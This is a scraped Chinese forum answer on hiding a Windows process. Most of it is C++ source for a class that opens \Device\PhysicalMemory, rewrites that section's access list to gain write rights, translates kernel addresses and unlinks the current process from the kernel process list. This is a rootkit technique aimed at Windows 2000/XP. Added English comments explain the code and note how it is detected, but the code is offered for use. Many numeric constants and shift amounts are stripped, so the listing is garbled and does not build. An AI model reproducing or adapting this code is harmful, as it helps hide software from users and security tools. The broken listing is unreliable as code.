
pmap 源码



pmap 源码

怎么隐藏进程

       下载HideWindowPlus,源码可以隐藏.和老板键一样.注意,要无毒的,网上有些挂马了.

       多特软件站为上品.

       老兄,你的那位老兄一定说错了.不过按你说的这么干其实也不是不行,只是你得联系九游让他们把奇迹的源码给你,然后你再编译加入隐藏进程的代码,否则不可能.

       头文件如下:

       // Declaration of the process-hiding helper exactly as posted. The
       // implementation (the .cpp below) opens \Device\PhysicalMemory from user
       // mode, translates virtual to physical addresses by walking page tables,
       // and rewrites two kernel list pointers so this process is unlinked from
       // the list that process enumeration walks (Direct Kernel Object
       // Manipulation, a classic rootkit technique).
       // Defensive notes: OpenPhysicalMemory refuses to run unless the OS major
       // version is 5, and later Windows releases are understood to reject
       // user-mode opens of that section (NOTE(review): confirm for the target).
       // The DACL rewrite on the section and the list unlinking are both strong
       // signals for object-access auditing, EDR and memory forensics.
       class CHideProcss

       {

       public:

        CHideProcss();   // empty

        BOOL HideProcess();   // public entry point: runs YHideProcess once, always returns true

        virtual ~CHideProcss();   // empty

       private:

        BOOL InitNTDLL();   // loads ntdll.dll, resolves RtlInitUnicodeString and ZwOpenSection

        BOOL YHideProcess();   // the actual unlinking sequence

        VOID CloseNTDLL();   // releases the ntdll.dll reference taken by InitNTDLL

        VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);   // grants the current user SECTION_MAP_WRITE on the section's DACL

        HANDLE OpenPhysicalMemory();   // opens and maps \Device\PhysicalMemory; NULL on failure

        PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);   // page-table walk: virtual -> physical, 0 if not present

        ULONG GetData(PVOID addr);   // reads a ULONG from kernel memory through the section

        BOOL SetData(PVOID addr,ULONG data);   // writes a ULONG into kernel memory through the section

        // Declared as a non-static member, so it cannot actually be passed as an
        // unhandled-exception filter; the only use is commented out in YHideProcess.
        long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);

       };

       2. CPP 文件如下

       // HideProcss.cpp: implementation of the CHideProcss class.

       //进程隐藏程序

       // 要隐藏时调用HideProcess即可

       //////////////////////////////////////////////////////////////////////

       #i nclude "stdafx.h"

       #i nclude "HideProcss.h"

       #i nclude<windows.h>

       #i nclude<Accctrl.h>

       #i nclude<Aclapi.h>

       #ifdef _DEBUG

       #undef THIS_FILE

       static char THIS_FILE[]=__FILE__;

       #define new DEBUG_NEW

       #endif

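       // --- Native-API declarations used by the class (as posted) -------------------
       // NOTE(review): the hex literals in this block were stripped by the page
       // extraction ("0xL", "0xCL"). They are left as found rather than guessed, so
       // the listing does not build as-is. As written both STATUS_* macros expand
       // to the same value, which would make the STATUS_ACCESS_DENIED test in
       // OpenPhysicalMemory indistinguishable from STATUS_INFO_LENGTH_MISMATCH.
       #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
       #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xCL)
       #define STATUS_ACCESS_DENIED ((NTSTATUS)0xCL)

       typedef LONG NTSTATUS;

       // Native I/O status block; declared here because the author did not
       // include the DDK headers. (Stray site text that the page had injected
       // into this typedef, breaking it, is removed.)
       typedef struct _IO_STATUS_BLOCK
       {
        NTSTATUS Status;
        ULONG Information;
       } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

       // Counted UTF-16 string as used by the native API.
       typedef struct _UNICODE_STRING
       {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
       } UNICODE_STRING, *PUNICODE_STRING;

       // OBJ_* attribute flags: numeric values lost in extraction, left as found.
       // Only attributes.Attributes = 0 is used by OpenPhysicalMemory, so none of
       // these are actually referenced.
       #define OBJ_INHERIT 0xL
       #define OBJ_PERMANENT 0xL
       #define OBJ_EXCLUSIVE 0xL
       #define OBJ_CASE_INSENSITIVE 0xL
       #define OBJ_OPENIF 0xL
       #define OBJ_OPENLINK 0xL
       #define OBJ_KERNEL_HANDLE 0xL
       #define OBJ_VALID_ATTRIBUTES 0xF2L

       // Object attributes block passed to ZwOpenSection.
       typedef struct _OBJECT_ATTRIBUTES
       {
        ULONG Length;
        HANDLE RootDirectory;
        PUNICODE_STRING ObjectName;
        ULONG Attributes;
        PVOID SecurityDescriptor;
        PVOID SecurityQualityOfService;
       } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

       // Function-pointer types for the two ntdll exports resolved in InitNTDLL.
       typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
        OUT PHANDLE SectionHandle,
        IN ACCESS_MASK DesiredAccess,
        IN POBJECT_ATTRIBUTES ObjectAttributes
        );

       typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
        IN OUT PUNICODE_STRING DestinationString,
        IN PCWSTR SourceString
        );

       // Resolved at run time by InitNTDLL; NULL until then.
       RTLINITUNICODESTRING RtlInitUnicodeString;
       ZWOPENSECTION ZwOpenSection;

       HMODULE g_hNtDLL = NULL;             // module handle from LoadLibrary("ntdll.dll")
       PVOID g_pMapPhysicalMemory = NULL;   // view of the physical-memory section at the page-directory offset
       HANDLE g_hMPM = NULL;                // section handle for \Device\PhysicalMemory
       OSVERSIONINFO g_osvi;                // filled by OpenPhysicalMemory, reread in YHideProcess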

       //---------------------------------------------------------------------------

       //////////////////////////////////////////////////////////////////////

       // Construction/Destruction

       //////////////////////////////////////////////////////////////////////

       // Constructor: intentionally empty; all state lives in file-scope globals.
       CHideProcss::CHideProcss()

       {

       }

       // Destructor: intentionally empty. Note that g_pMapPhysicalMemory is never
       // unmapped anywhere in the listing, so the view outlives the object.
       CHideProcss::~CHideProcss()

       {

       }

       // Loads ntdll.dll and resolves the two native functions used later.
       // Returns FALSE only when LoadLibrary fails. The two GetProcAddress results
       // are stored without a NULL check, so a missing export would surface as a
       // crash inside OpenPhysicalMemory rather than as a clean failure here.
       BOOL CHideProcss::InitNTDLL()

       {

        g_hNtDLL = LoadLibrary("ntdll.dll");

        if (NULL == g_hNtDLL)

        return FALSE;

        // Resolved at run time rather than linked; neither result is validated.
        RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,

        "RtlInitUnicodeString");

        ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

        return TRUE;

       }

       //---------------------------------------------------------------------------

       // Releases the ntdll.dll reference taken by InitNTDLL, if one is held, and
       // resets the global so a later InitNTDLL starts from a clean state.
       VOID CHideProcss::CloseNTDLL()
       {
         HMODULE hModule = g_hNtDLL;
         g_hNtDLL = NULL;
         if (hModule != NULL)
           FreeLibrary(hModule);
       }

       //---------------------------------------------------------------------------

       // Rewrites the DACL of hSection so the trustee "CURRENT_USER" is granted
       // SECTION_MAP_WRITE: read the current DACL (GetSecurityInfo), merge one
       // EXPLICIT_ACCESS entry into a new ACL (SetEntriesInAcl), write it back
       // (SetSecurityInfo). hSection is the \Device\PhysicalMemory handle opened
       // with WRITE_DAC in OpenPhysicalMemory.
       // NOTE(review): each error branch frees the buffers but does not return,
       // so the next call runs with a NULL pDacl/pNewDacl and the freed pSD may be
       // freed a second time in a later branch; on the success path pSD and
       // pNewDacl are never freed. Changing the DACL of this kernel object is a
       // high-value event for object-access auditing and EDR detection.
       VOID CHideProcss::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)

       {

        PACL pDacl = NULL;

        PSECURITY_DESCRIPTOR pSD = NULL;

        PACL pNewDacl = NULL;

        // Existing DACL; pSD receives the whole descriptor and owns pDacl.
        DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,

        NULL, &pDacl, NULL, &pSD);

        if(ERROR_SUCCESS != dwRes)

        {

        if(pSD)

        LocalFree(pSD);

        if(pNewDacl)

        LocalFree(pNewDacl);

        }   // falls through: no return on failure

        // One ACE granting SECTION_MAP_WRITE to the special trustee name
        // "CURRENT_USER" (resolved by SetEntriesInAcl to the calling user).
        EXPLICIT_ACCESS ea;

        RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));

        ea.grfAccessPermissions = SECTION_MAP_WRITE;

        ea.grfAccessMode = GRANT_ACCESS;

        ea.grfInheritance= NO_INHERITANCE;

        ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;

        ea.Trustee.TrusteeType = TRUSTEE_IS_USER;

        ea.Trustee.ptstrName = "CURRENT_USER";

        // Merge the new ACE with the existing DACL into pNewDacl.
        dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

        if(ERROR_SUCCESS != dwRes)

        {

        if(pSD)

        LocalFree(pSD);

        if(pNewDacl)

        LocalFree(pNewDacl);

        }   // falls through: no return on failure

        // Apply the merged DACL to the section object itself.
        dwRes = SetSecurityInfo

        (hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

        if(ERROR_SUCCESS != dwRes)

        {

        if(pSD)

        LocalFree(pSD);

        if(pNewDacl)

        LocalFree(pNewDacl);

        }   // success path leaks pSD and pNewDacl

       }

       //---------------------------------------------------------------------------

       // Opens the \Device\PhysicalMemory section into g_hMPM and maps a view of
       // it at the page-directory offset into g_pMapPhysicalMemory.
       // Returns g_hMPM on success, NULL when the OS is not major version 5 with
       // minor version 0 or 1, when the open fails, or when the mapping fails.
       // NOTE(review): the page-directory offsets and the view size were lost in
       // extraction ("0x;"); they are left as found. When MapViewOfFile fails the
       // open section handle is not closed before returning NULL.
       HANDLE CHideProcss::OpenPhysicalMemory()

       {

        NTSTATUS status;

        UNICODE_STRING physmemString;

        OBJECT_ATTRIBUTES attributes;

        ULONG PhyDirectory;

        // Version gate: the hard-coded physical offsets below are per-release.
        g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

        GetVersionEx (&g_osvi);

        if (5 != g_osvi.dwMajorVersion)

        return NULL;

        switch(g_osvi.dwMinorVersion)

        {

        case 0:

        PhyDirectory = 0x;   // value lost in extraction

        break; // Windows 2000 ("2k" in the original)

        case 1:

        PhyDirectory = 0x;   // value lost in extraction

        break; // Windows XP ("xp" in the original)

        default:

        return NULL;

        }

        RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

        attributes.Length = sizeof(OBJECT_ATTRIBUTES);

        attributes.RootDirectory = NULL;

        attributes.ObjectName = &physmemString;

        attributes.Attributes = 0;

        attributes.SecurityDescriptor = NULL;

        attributes.SecurityQualityOfService = NULL;

        // First attempt: read/write mapping rights.
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

        if(status == STATUS_ACCESS_DENIED)

        {

        // Denied: reopen with only READ_CONTROL|WRITE_DAC, rewrite the DACL to
        // grant the current user write access, close, and retry the first open.
        // The status of this intermediate open is overwritten unchecked.
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);

        SetPhyscialMemorySectionCanBeWrited(g_hMPM);

        CloseHandle(g_hMPM);

        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

        }

        if(!NT_SUCCESS(status))

        return NULL;

        // Map the page directory so LinearToPhys can index it as PULONG.
        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

        0x);   // view size lost in extraction

        if( g_pMapPhysicalMemory == NULL )

        return NULL;   // g_hMPM stays open here

        return g_hMPM;

       }

       //---------------------------------------------------------------------------

       // Translates the virtual address addr to a physical address by walking
       // the page directory mapped at BaseAddress (g_pMapPhysicalMemory).
       // Returns 0 when the directory entry or page-table entry has bit 0 (present)
       // clear. NOTE(review): the shift amounts and most masks were lost in
       // extraction (">>", "0x"); from the surviving masks (0xFFF, 0xFFFFF) this
       // appears to be a two-level 32-bit, non-PAE walk, with the non-zero `tmp`
       // branch handling a large-page directory entry — confirm before relying on
       // that reading. The (ULONG) casts of pointers only hold on 32-bit builds.
       PVOID CHideProcss::LinearToPhys(PULONG BaseAddress, PVOID addr)

       {

        ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;

        // Page-directory entry selected by the top bits of VAddr (shift lost).
        PGDE = BaseAddress[VAddr>>];

        if (0 == (PGDE&1))

        return 0;

        // Flag masked out of the directory entry; mask lost in extraction.
        ULONG tmp = PGDE & 0x;

        if (0 != tmp)

        {

        // Directory entry maps the page directly: frame bits plus page offset.
        PAddr = (PGDE & 0xFFC) + (VAddr & 0xFFFFF);

        }

        else

        {

        // Map the page table (access 4 == FILE_MAP_READ) and read the PTE.
        // NOTE(review): the MapViewOfFile result is dereferenced without a NULL check.
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff, 0x);

        PTE = ((PULONG)PGDE)[(VAddr&0xFF)>>];

        if (0 == (PTE&1))

        return 0;   // page not present; the view mapped above is not unmapped

        PAddr=(PTE&0xFFFFF)+(VAddr&0xFFF);

        UnmapViewOfFile((PVOID)PGDE);

        }

        return (PVOID)PAddr;

       }

       //---------------------------------------------------------------------------

       // Reads the ULONG at kernel virtual address addr through the physical-memory
       // section: translate with LinearToPhys, map the containing page, index the
       // ULONG at the page offset, unmap. Returns 0 when the mapping fails.
       // NOTE(review): a 0 from LinearToPhys (page not present) is not treated as
       // an error, so the read silently falls through to physical page 0; callers
       // cannot distinguish a read value of 0 from a failure.
       ULONG CHideProcss::GetData(PVOID addr)

       {

        ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);

        // Map the page containing phys (page-frame mask; view size lost in extraction).
        PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

        0xfffff, 0x);

        if (0 == tmp)

        return 0;

        // Byte offset within the page, converted to a ULONG index.
        ULONG ret = tmp[(phys & 0xFFF)>>2];

        UnmapViewOfFile(tmp);

        return ret;

       }

       //---------------------------------------------------------------------------

       // Writes data as a ULONG at kernel virtual address addr through the
       // physical-memory section (mirror of GetData with FILE_MAP_WRITE).
       // Returns FALSE only when MapViewOfFile fails. This is the primitive that
       // YHideProcess uses to patch kernel list pointers; a user-mode process
       // writing kernel memory this way is the behaviour that memory-integrity
       // controls and forensics tooling are designed to catch.
       // NOTE(review): as in GetData, a 0 from LinearToPhys is not treated as an
       // error, so a write can land in physical page 0.
       BOOL CHideProcss::SetData(PVOID addr,ULONG data)

       {

        ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);

        // Map the page containing phys writable (view size lost in extraction).
        PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff, 0x);

        if (0 == tmp)

        return FALSE;

        tmp[(phys & 0xFFF)>>2] = data;

        UnmapViewOfFile(tmp);

        return TRUE;

       }

       //---------------------------------------------------------------------------

       // Intended as an unhandled-exception filter: terminates the process with
       // exit code 0 so a fault during the memory patching does not produce a
       // visible crash. The return is unreachable after ExitProcess. Because this
       // is a non-static member function it cannot be passed to
       // SetUnhandledExceptionFilter, and the only call site is commented out.
       long __stdcall CHideProcss::exeception(struct _EXCEPTION_POINTERS *tmp)

       {

        ExitProcess(0);

        return 1 ;

       }

       //---------------------------------------------------------------------------

       // The hiding sequence: load ntdll, open/map physical memory, locate the
       // current process's kernel block via two pointer reads, read its forward
       // and backward list pointers at version-specific offsets, then write each
       // neighbour's link to point at the other so this entry is spliced out of
       // the list. Returns FALSE if ntdll or the section cannot be opened, TRUE
       // otherwise (the SetData results are ignored).
       // Defensive notes: this is DKOM list unlinking; it is detected by cross-view
       // comparison of process enumeration against kernel structures and by
       // memory-forensics scanning for process objects that are not on the list.
       // NOTE(review): several constants were lost in extraction ("0x", "0xFFDFF");
       // GetData returning 0 is never treated as failure, so a failed read leads to
       // writes at addresses 0 and 4; fw/bw are only assigned for minor versions 0
       // and 1 (other versions are already rejected by OpenPhysicalMemory); the
       // view g_pMapPhysicalMemory is never unmapped.
       BOOL CHideProcss::YHideProcess()

       {

       // SetUnhandledExceptionFilter(exeception);

        if (FALSE == InitNTDLL())

        return FALSE;

        if (0 == OpenPhysicalMemory())

        return FALSE;

        // Fixed kernel address (low digits lost); original comment: "kteb".
        ULONG thread = GetData((PVOID)0xFFDFF); //kteb

        // Process block pointer read at an offset inside it; original comment: "kpeb".
        ULONG process = GetData(PVOID(thread + 0x)); //kpeb

        // Forward and backward pointers of the list entry inside the process block.
        ULONG fw, bw;

        if (0 == g_osvi.dwMinorVersion)

        {

        fw = GetData(PVOID(process + 0xa0));

        bw = GetData(PVOID(process + 0xa4));

        }

        if (1 == g_osvi.dwMinorVersion)

        {

        fw = GetData(PVOID(process + 0x));   // offset lost in extraction

        bw = GetData(PVOID(process + 0x8c));

        }

        // Unlink: next->back = back; back->next = next.
        SetData(PVOID(fw + 4), bw);

        SetData(PVOID(bw), fw);

        CloseHandle(g_hMPM);

        CloseNTDLL();

        return TRUE;

       }

       // 隐藏进程的显示

       // Public entry point. Runs YHideProcess at most once per process (a static
       // flag guards repeat calls) and always reports true; the result of
       // YHideProcess is ignored, as in the original.
       BOOL CHideProcss::HideProcess()
       {
         static BOOL s_already_hidden = false;
         if (s_already_hidden)
           return true;
         s_already_hidden = true;
         YHideProcess();
         return true;
       }

       其实隐藏程序就行了，它只会在进程中出现，其他地方找不到的。也不会影响星际。前提是你的电脑够牛。
